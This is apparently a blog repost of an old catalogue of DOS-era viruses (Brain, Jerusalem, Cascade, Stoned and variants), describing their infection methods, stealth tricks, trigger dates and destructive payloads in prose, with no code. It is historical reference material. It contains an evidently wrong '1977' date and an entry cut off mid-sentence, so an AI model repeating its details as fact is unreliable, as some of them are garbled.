This virus is the Golden Gate virus that is able to infect a
hard disk. It is a nasty virus, since it has more of an
opportunity to do damage than previous versions. Prior
versions were limited since systems with hard disks are only
infrequently booted from floppy and booting from hard disk
overwrote earlier versions.
8. GOLDEN GATE-D
This virus is identical to number 7, except the counter has
been disabled (similar to original Alameda).
9. THE BRAIN
(Also called, Pakistani Brain; Basit Virus)
This virus originated in January, 1986, in Lahore Pakistan.
It is the only virus yet discovered that includes the valid
names address and phone numbers of the original
perpetrators. The Brain is a boot sector infector,
approximately 3K in length, that infects 5 1/4" floppies.
It cannot infect hard disks. It will infect a diskette
whenever the diskette is referenced. For example, a
Directory command, executing a program from the diskette,
copying a file from or to the diskette or any other access
will cause the infection to occur. The virus stores the
original boot sector, and six extension sectors, containing
the main body of the virus, in available sectors which are
then flagged as bad sectors.
The virus is able to hide from detection by intercepting any
interrupt that might interrogate the boot sector and re-
directing the read to the original boot sector. Thus,
programs like the Norton Utilities will be unable to see the
virus.
Infected diskettes are noticeable by "@BRAIN" displayed in
the volume label.
10. BRAIN-B
(Also called Brain-HD; the Hard Disk Brain; Houston Virus)
This virus is identical in every respect to the original
Brain, with the single exception that it can infect the C
drive.
11. BRAIN-C
This virus is the Brain-B that has the volume label code
removed. The volume label of infected diskettes does not
change with this virus. This virus was difficult to detect
since it does nothing overt in the system.
12. CLONE VIRUS
This virus is the Brain-C that saves the original boot
copyright label and restores it to the infected boot. The
Basit & Mjad original Brain messages have been replaced with
non-printable garbage that looks like instructions if viewed
through Norton or other utility. Even if the system is
booted from a clean diskette, it is virtually impossible to
tell, by visual inspection, whether the hard disk is
infected.
13. SHOE_VIRUS
(Also called UIUC Virus)
This virus is the Brain-B Virus that has been modified to
include the message - "VIRUS_SHOE RECORD, v9.0. Dedicated
to the dynamic memories of millions of virus who are no
longer with us today". The message is never displayed.
14. SHOE_VIRUS-B
This is the Shoe_Virus that has been modified to so that it
can no longer infect hard disks. The v9.0 has been changed
to v9.1.
15. ClONE-B
This is the Clone virus that has been modified to corrupt
the FAT when it is booted after May 5, 1992. There are no
other apparent modifications.
16. DOS-62
(Also called the UNESCO Virus)
This virus is a COM infector. It was first discovered in
Moscow in April, 1988. It was first publicized in August
1988 when it cropped up at a children's computer Summer camp
run by UNESCO. When a program infected by this virus is
executed, it infects one other COM file in the system. On a
random basis, infected programs will perform a system re-
boot when they are executed.
17. 62-B
This virus is similar to DOS-62 except the re-boot is
replaced by deleting the executed program.
18. FRIDAY THE 13th
(Also called COM Virus; 512 virus)
This virus is a non-resident COM infector that first
appeared in South Africa in 1987. At each execution of an
infected program the virus seeks out two other COM files on
the C drive and one COM file on the A drive and infects
them. The virus is extremely fast and the only indication
of infection occurring is the access light on the A drive
(if the current drive is C). The virus will only infect a
file once.
On every Friday 13 the virus deletes the host program if it
is executed on that day (similar to the Jerusalem).
19. Friday 13th-B
This virus is identical to the original except that it
infects every file in the current subdirectory. The only
way this virus can spread beyond the current subdirectory is
if an infected program ends up in the system PATH. Then
every COM file in the currently selected subdirectory will
get infected.
20. Friday 13th-C
This is the 13th-B except a message has been added that
displays - "We hope we haven't inconvenienced you" appears
whenever the virus activates.
21. JERUSALEM
(Also called Israeli; Friday the 13th; PLO)
This virus is a memory resident COM and EXE infector. It
was first discovered at the Hebrew University in Jerusalem
in the fall of 1987. It contains a flaw which makes it re-
infect EXE files over and over until the files become too
big to fit into memory. The virus re-directs interrupt 8
(among others) and one-half hour after an infected program
loads, the new timer interrupt introduces a delay which
slows down the processor by a factor of about 10. On every
Friday the 13, the virus deletes every program executed
during the day.
22. JERUSALEM-B
This virus is identical to the Jerusalem except it is able
to successfully identify pre-existing infections in EXE
files and will only infect them once.
23. JERUSALEM-C
(Also called the New Jerusalem)
This virus is identical to Jerusalem-B except that the timer
interrupt delay code has been bypassed. This virus is
virtually invisible until it activates.
24. BLACK HOLE
(Also called the Russian Virus)
This virus is the Jerusalem-C that has odd text and
additional code that is never referenced. A new interrupt
eight routine is added to the non referenced area and a
number of interrupt 21 calls which appear meaningless. The
additional text includes - "ANTIVIRUS". It appears that
this virus is a modified version of some previous variety of
the Jerusalem which we have not yet seen.
25. JERUSALEM-D
This is the Jerusalem-C that destroys both versions of the
FAT on any Friday the 13th after 1990. The code that
originally deleted executed programs has been overwritten
with the FAT destructive code.
26. JERUSALEM-E
This is identical to the D variety except the activation is
any Friday the 13th after 1992.
27. CENTURY VIRUS
(Also called the Oregon Virus)
This is similar to the Jerusalem-C except the activation
date is January 1, 2000. When the virus activates, it
erases both FATs on all connected drives and then begins
writing zeroes to every sector on every attached device. If
allowed to continue to completion, it displays the message -
" Welcome to the 21st Century".
28. CENTURY-B
This virus is similar to the original Century virus with the
following exception:
It waits for BACKUP.COM to be executed and then garbles all
program writes. After BACKUP terminates, the output
functions return to normal.
29. 1701
(Also called Cascade; Falling Tears)
This virus evolved from a trojan horse disguised as a
utility to automatically turn off the num-lock light at
system boot. The trojan horse caused the characters on the
screen to fall to the bottom of the screen in systems with
CGA monitors. In late 1977 this trojan horse was turned
into a memory resident COM virus. It gets it's name from
the size increase of infected COM files - 1701 bytes. The
virus has some unique qualities:
- It uses an encryption algorithm to avoid detection
and complicate any attempted analysis.
- It contains a sophisticated activation algorithm
that is based on randomizations, machine types,
monitor type, presence or absence of clock cards,
and time of year.
- It was designed to infect only IBM clones. True
IBM systems would be spared.
The virus has a bug that causes the machine selection
algorithm to fail. The virus activates on any machine with
a CGA or VGA monitor, in the months of September, October,
November or December in the year 1980 or 1988 (systems
without clock cards will often have a date set to 1980).
30. 1701-B
This virus is identical to the 1701 except that it activates
in the fall of any year.
31. 1704
(Also called Cascade; Falling Tears)
I would prefer to classify this virus as a variety of the
1701 but it has been universally referred to as a separate
virus, so I will go along with the crowd on this one. It is
functionally identical to the 1701 except that the IBM
selection bug has been repaired. The new virus is three
bytes longer. In every other respect it is the same.
32. 1704-B
This virus is identical to the 1704, except the cascade
display has been replaced with a system re-boot when the
virus activates. The activation uses the same interrupt 8
randomization algorithm, so the reboot will occur at a
random time interval after executing an infected program on
or after the activation date.
33. 1704-C
This virus is the same as the 1704-B, except the activation
date has been changed to occur in December of any year.
34. 1704-D
This virus is the same as the 1704, except the IBM selection
has been disabled (the virus infects true IBM PCs).
35. LEHIGH
This is a COMMAND.COM infector that first surfaced at Lehigh
University in late 1987. It is the widest known virus, the
most discussed and the most analyzed of all the viruses, so
I won't waste any more time on it.
36. SEARCH
(Also called Den Zuk; Venezuelan)
This is a boot sector infector that infects 360KB 5 1/4"
floppies. It infects through any access to the host
diskette. It can survive a warm reboot. It will infect
data (non-system) diskettes, which in turn can pass on the
infection if an accidental attempt to boot from the data
disk occurs. It has a bug which causes it incorrectly
attempt to infect 3.5" diskettes. This will overwrite the
diskette's FAT and cause a read (or write) failure. It
cannot infect a hard disk, and will not attempt to do so.
If an infected system is rebooted from the hard disk, the
virus will de-activate. This is not the case with rebooting
from a clean floppy - which will become infected.
The virus causes CGA, EGA and VGA screens to display a
purple "DEN ZUK" graphic to appear after a
37. SEARCH-HD
This virus is identical to the Search Virus, except it's
able to infect hard disks.
38. SEARCH-B
This virus is identical to the Search virus, but
unsuccessful modifications have been made to fix the 3.5"
diskette problem. The 3.5" infection still fails, plus
unsuccessful attempts to infect the hard disk will occur
which result in system failure in some systems.
39. SYS VIRUS
This virus is really a modification of the Search-HD virus.
The display code has been replaced (no display occurs on
reboot) by code that disables the SYS program. The SYS
program itself is not modified, but any attempt to execute
SYS will result in the program not being loaded. Instead,
multiple reads to the source and target drives will occur
(to simulate the SYS activity). The normal SYS message
output is displayed by the virus at the appropriate time.
This virus will successfully avoid being removed by SYS.
The virus does no damage.
40. SYS-B
This is similar to the SYS virus, but it performs a hard
disk format on any Friday 13th after 1990. This virus, and
its precursor virus both still contain the 3.5" bug, so that
they are easily detected on systems using 3.5" drives. They
are difficult to detect on other systems.
41. SYS-C
Similar to the SYS virus but performs random reboots
beginning 2 hours after power-on or initial boot.
42. 648 VIRUS
(Also called the Austrian Virus)
This is a COM infector that increases the size of the
infected file by 648 bytes. It was first reported in London
in the fall of 1988. It is not a memory resident virus. It
infects the next uninfected COM file in the current
directory (similar to the original Friday 13th). It does no
overt damage.
43. 648-B
This is similar to the 648, but it causes infrequent errors
in the infected COM file so that the file will not execute.
Approximately one file in ten will be corrupted.
44. STONED
(Also called New Zealand Virus)
This is a boot sector infector that infects 360 KB 5 1/4"
floppies. It was first reported in Wellington, New Zealand
in early 1988). It displays - "Your computer is now stoned.
Legalize Marijuana" every 8th bootup. No overt damage.
Unable to infect hard disk.
45. STONED-B
Variation of Stoned. Has been changed to be able to infect
hard disks. The hard disk is infected as soon as an
infected floppy is booted. No intentional damage done,
except systems with RLL controllers will frequently hang.
46. STONED-C
This is the Stoned-B virus that no longer displays the
"Stoned" message. This virus is difficult to detect.
47. VERA CRUZ
(Also Called Bouncing Ball; Italian Virus)
This is a boot sector virus that was first reported in March
1988. It is a floppy-only infector.
When this virus activates (randomly) a bouncing dot appears
on the screen and can only be removed through reboot. No
other damage is done.
48. VERA CRUZ-B
This is a variation of the Vera Cruz that is able to infect
Hard disks.
Ref :http://myanmar-hacking-team.wetpaint.com/page/Computer+Virus
Subscribe to:
Posts (Atom)